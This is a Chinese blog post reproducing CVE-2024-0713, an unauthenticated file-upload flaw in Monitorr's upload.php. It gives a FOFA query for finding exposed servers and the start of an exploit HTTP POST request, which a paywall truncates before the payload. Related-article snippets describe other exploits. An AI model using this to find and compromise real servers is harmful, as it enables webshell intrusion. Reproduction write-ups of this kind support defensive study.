Monitorr 任意文件上传漏洞复现(CVE-2024-0713)

最新推荐文章于 2024-06-08 09:38:41 发布
最新推荐文章于 2024-06-08 09:38:41 发布
阅读量1.6k 收藏 3
点赞数 6
分类专栏: 漏洞复现v1 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41904294/article/details/135800679
版权
本文介绍了Monitorr 1.7.6m版本的一个关键安全漏洞,该漏洞允许未经身份验证的攻击者通过/assets/php/upload.php的fileToUpload参数进行不受限制的文件上传,可能导致服务器被攻陷。复现环境涉及FOFA查询,以及漏洞利用和修复建议的说明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。

0x02 漏洞概述

Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。

0x03 复现环境

FOFA:body="assets/php/timestamp.php"

0x04 漏洞复现

Exp

POST /assets/php/upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q

------WebKitFormBoundaryMmx988TUuintqO4Q
Co
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现Monitorr-upload-文件上传(CVE-2024-0713)
知黑而守白
01-25 253
Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。Monitorr upload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
Jenkins-Remoting 任意文件读取漏洞(CVE-2024-43044)
iSee857的博客
09-10 2123
Jenkins 使用 Remoting 库(通常为agent.jar或remoting.jar)实现控制器与代理之间的通信,该库允许代理从控制器加载类和类加载器资源,以便从控制器发送的 Java 对象(构建步骤等)可以在代理上执行。当获取到node1机器的权限后,可以得到连接到Jenkins主服务器的secret和name,这时需要将连接使用的agent.jar替换成恶意的Agent连接Jar包。连接成功后在Jenkins主服务器上可以看到已连接的标识,成功连接之后就可以在Agent节点上部署任务了。
CVE-2024-0713 Monitorr 文件上传漏洞分析
weixin_39205521的博客
01-25 780
Monitorr是一个自托管的PHP网络应用,可以监控本地和远程网络服务、网站和应用的状态。经过分析,该系统存在文件上传漏洞,攻击者可以通过该漏洞上传webshell至目标系统从而获取目标系统权限。该产品为开源产品:https://github.com/Monitorr/Monitorr。厂商官网 https://github.com/Monitorr/Monitorr。description: 产品已经停止更新,影响全版本,直接文件上传漏洞厂商 Monitorr。影响产品 Monitorr
探秘漏洞世界的守护者:Monitor——你的全方位安全监控平台
gitblog_00097的博客
06-08 535
探秘漏洞世界的守护者:Monitor——你的全方位安全监控平台 去发现同类优质开源项目:https://gitcode.com/ 在这个数字化的时代,网络安全成为了我们日常生活中不可或缺的一部分。而面对瞬息万变的网络环境,及时发现并应对潜在的安全威胁变得至关重要。为此,我们推荐一款开源的漏洞监控平台——Monitor,它不仅集成了最新的漏洞信息来源,还提供了智能化的通知服务,确保你能时刻保持警惕,...
任意文件上传漏洞(简介)
diaobusi的博客
08-22 805
文件上传是指将文件从本地计算机或其他设备上传到网络服务器或其他存储位置的过程。通过文件上传,您可以将文件(如图像、文档、音频或视频等)传输到网络上的不同位置,以实现文件共享、备份、存储或与他人共享内容等目的。用户选择要上传的文件:用户在自己的设备上选择要上传的文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件被传输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实现文件传输。
DC-6 靶机渗透测试-activity-monitor插件漏洞_nmap提权等
single_g_l的博客
05-14 1161
一. 环境 靶机:192.168.1.8 攻击机kali:192.168.1.209 (l网络配置都是NAT模式) ----开始---渗透 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现
VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)
aarong的博客
12-28 3425
靶机来源:https://www.vulnhub.com/entry/dc-6,315/ 1.扫描(arp-scan和nmap) 可以看到靶机开放了两个端口分别是22和80 2.打开浏览器浏览靶机网页 发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。 所以打开hosts文件绑定靶机IP: 路径为/etc/hosts 修改为: 靶机IP wordy 再次打开浏览器访问就可以访问成功了: 发现这个网页使用的是非
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2024-53677
12-17
已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,可以利用这些缺陷进行路径遍历和恶意文件上传。 该漏洞会影响 ...
Vulnhub靶场渗透测试系列DC-6(WordPress的activity monitor插件漏洞)
qq_45722813的博客
12-07 888
Vulnhub靶场渗透测试系列DC-6 下载地址:https://www.vulnhub.com/entry/dc-6,315/ 将下载好的靶机导入到VMware中,修改网络模式为NAT模式,开启靶机虚拟机 在kali机使用命令nmap -Pn 192.168.172.1/24主机发现,获取靶机IP地址 ...
HelpDeskZ v1.0.2 任意文件上传漏洞 学习
qq_34717555的博客
06-10 360
在靶场练习时遇到一个helpdeskZ v1.0.2的站点 于是学习并按照漏洞写了一个 查找上传文件的脚本 在提交机票处可以上传任意文件虽然会后台没有在文件验证失败后取消上传 也许是对上传文件的处理可以使得不会造成影响 在上传后 后台 将文件名与服务器当前时间做了一个md5加密 详情参考源文件 这里不贴出来了 源代码注释很详细 虽然在获得服务器时间的地方出了不少问题 走了不少弯路 (...
OTP supervisor的monitor_child是否有漏洞
taotaotheripper的专栏
05-07 977
问题描述 OTP的supervisor中为了防止淘气的Child从link的另一端断掉link,supervisor会在shutdown child之前unlink(Child)并切换为monitor状态,这样supervisor对Child的监控将无法被Chlid终止。这段代码是由monitor_child/1实现的,其具体实现代码如下: 872 %% Help function to
CVE-2024-0713 Monitorr 服务配置 upload.php 无限制上传漏洞
白昼小丑的博客
02-27 791
## Monitorr是一个自托管的PHP网络应用,可以监控本地和远程网络服务、网站和应用的状态。经过分析,该系统存在文件上传漏洞,攻击者可以通过该漏洞上传webshell至目标系统从而获取目标系统权限。漏洞的位置在 assets\php\upload.php ,直接就是文件上传,唯一的检查是调用 getimagesize() 判断图片是否满足格式。
【SpringBoot项目】Druid未授权访问漏洞 禁用Druid Monitor
AlbenXie的博客
03-30 2971
是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。
漏洞复现】蓝凌EIS智慧协同平台任意文件上传
zkaqlaoniao的博客
10-25 1182
蓝凌智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用 统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台。
任意文件上传漏洞详解与防护
鑫和皓的博客
08-10 2101
任意文件上传漏洞是一种常见的网络安全问题,它允许攻击者上传并执行恶意文件,从而获取或破坏系统数据。上传恶意脚本:攻击者可以上传包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上传恶意二进制文件:攻击者可以上传包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上传文件:对上传文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件上传功能时,使用安全编程技术,如预备语句、输入验证等。
文件上传(包括编辑器上传漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
qq_44005305的博客
03-16 1315
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
解决druid 后台弱口令漏洞,springboot,亲测可用
weixin_42279465的博客
02-24 4544
druid 后台弱口令漏洞,综合利用漏洞,攻击者可以 登入系统数据库获取敏感数据,上传木马后门,存在安全隐患,具体 情况详情请见验证情况。Druid本身是不存在漏洞的,Druid未授权访问是因为开发者配置的不够全面,导致攻击者输入。即可直接即可登录到Druid监控界面,这就是所谓未授权,即可访问。修改application.properties文件。
AvtiveMQ任意文件上传漏洞(CVE-2016-3088)漏洞复现
最新发布
03-19
CVE-2016-3088 是 Apache ActiveMQ 的一个任意文件写入漏洞,主要由于 `fileserver` 应用未受保护且允许通过 HTTP 请求创建和移动文件。此漏洞影响的版本范围为 Apache ActiveMQ 5.x 至 5.14.0 版本[^3]。 --- ###...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值